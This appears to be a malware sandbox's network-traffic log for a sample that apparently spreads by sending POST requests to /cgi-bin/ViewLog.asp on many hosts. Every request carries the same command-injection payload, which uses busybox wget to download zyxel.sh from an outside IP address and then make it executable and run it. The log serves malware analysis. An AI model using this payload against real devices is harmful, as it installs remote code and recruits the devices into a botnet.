                                                      Set-Cookie: oc_sessionPassphrase=rap6E1SfwEHGYoleo8m4r2BBB0U7pZsdh%2FtYET1t%2Br43THlbr90Bqr5FKORR8i%2F%2Bp9lzcXPMXzwhuIPEE41h9DJdO0UKeI98CnNTVaD1Ca7pX735f2DPIZa6aTe9Sf2A; path=/; HttpOnly; SameSite=Lax
                                                      Set-Cookie: ocg4nas66t4k=031e107804889aa55840d6bdeb130047; path=/; HttpOnly; SameSite=Lax
                                                      Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-bHhGdExpanNPRWFweTk3cFVtK1Y2OEwwOW1ZMUlqVjZHTGJjWTFlcGhGcz06N25wVmFobUdhd1NiazRxOUFRclFpcFBDb0E4RGJIMUlYZmlJRTJUNDhRaz0='; style-src 'self' 'unsafe-inline'; frame-src *; img-src * data: blob:; font-src 'self' data:; media-src *; connect-src *; object-src 'none'; base-uri 'self';
                                                      Set-Cookie: nc_sameSiteCookielax=true; path=/; httponly;expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=lax
                                                      Data Raw:
                                                      Data Ascii:


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      915192.168.2.155047294.121.65.858080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:56.281953096 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      916192.168.2.153938694.120.254.88080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:56.282104015 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      917192.168.2.153644262.29.101.1988080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:56.282223940 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      918192.168.2.155921494.122.74.2108080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:56.282375097 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      919192.168.2.153440294.122.213.2198080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:56.282511950 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      920192.168.2.155833662.202.159.1588080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:56.432423115 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      921192.168.2.154301431.136.220.748080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:56.438390970 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:57.079629898 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:58.327661037 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:01.015522003 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:06.135298014 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:16.119232893 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:36.598474026 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:32:17.557364941 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      922192.168.2.155619231.136.252.1748080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:56.458348989 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:57.079617023 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:58.327678919 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:01.015505075 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:06.135315895 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:16.119199038 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:36.598490953 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:32:17.557343006 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      923192.168.2.154480631.41.163.1298080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:56.517520905 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      924192.168.2.156043694.120.16.2458080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:56.528074980 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      925192.168.2.153962694.123.2.1738080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:56.528233051 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      926192.168.2.154554494.121.153.328080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:56.529443979 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      927192.168.2.154027031.200.54.1758080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:56.529566050 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      928192.168.2.153542294.121.40.428080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:56.531040907 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      929192.168.2.154598831.44.136.2098080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:56.535346031 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      930192.168.2.155267631.220.76.1468080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:59.051281929 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:00.183609009 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
